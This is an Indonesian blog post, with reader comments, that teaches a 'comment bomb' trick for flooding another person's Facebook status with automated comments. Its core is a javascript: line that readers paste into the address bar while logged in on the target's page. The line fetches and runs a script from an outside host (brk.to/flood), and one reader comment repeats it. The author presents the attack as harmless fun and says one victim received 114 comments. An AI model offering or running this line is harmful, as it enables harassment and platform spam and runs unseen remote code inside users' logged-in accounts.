Membuat Serangan Bom Komentar di Facebook


Membuat Serangan Bom Komentar di Facebook




 Membuat Serangan Bom Komentar di Facebook

Siapa yang tidak punya akun facebook?
Gak mungkin lah kalian yang suka online sampai gak punya akun facebook.

Nah, posting ringan saya kali ini yaitu saya ingin berbagi tips hacking facebook untuk membuat banyak komentar secara otomatis di status facebook teman kita. Hal ini oleh sebagian orang disebut Jungker Facebook

Coba perhatikan status facebook dibawah ini yang saya gunakan sebagai contoh target.


Bisa kamu lihat disana, ada sebuah status facebook yang saya serang dengan 114 komentar, dan saya memberi komentar itu cukup dengan satu/dua langkah mudah tanpa harus berkali2 menulis komentar.

Kamu tertarik ingin mencobanya?

Ikuti langkah-langkah berikut ini :

a. Pertama, login ke facebook kamu, lalu cari halaman facebook orang lain sebagai target

Contoh target
b. Setelah menemukan target, lalu masukkan script dibawah ini ke Address Bar halaman facebook target tersebut

javascript: (a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0)
Paste-kan script diatas ke Address Bar pada browser internet yang kamu gunakan untuk membuka halaman facebook target.

Setelah itu kamu tekan Enter.



Setelah Enter nanti akan muncul kotak isian jumlah komentar yang ingin kamu kirimkan ke facebook target.


Setelah itu klik OK
Masukkan juka teks pesan yang kamu inginkan (misal "hallo....ini bom komentar facebook").


Setelah itu, klik OK lagi.
Tunggu proses-nya berjalan sekitar 30 detik (tergantung jumlah komentar yang kamu kirim)
Setelah prosesnya selesai maka akan terlihat pada bagian komentar facebook target akan dibanjiri komentar yang kamu kirimkan.


Lihat contoh target saya, dia saya kirimi 114 komentar tadi pagi.

Semoga trik bermain-main dengan facebook diatas dapat bermanfaat.

7 comments:

Kalau pake hp gk bisa yah

kalo itu auto like bisa ya?

gak bisa minnn
gimana niiii

javascript: (a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0)

Posting Komentar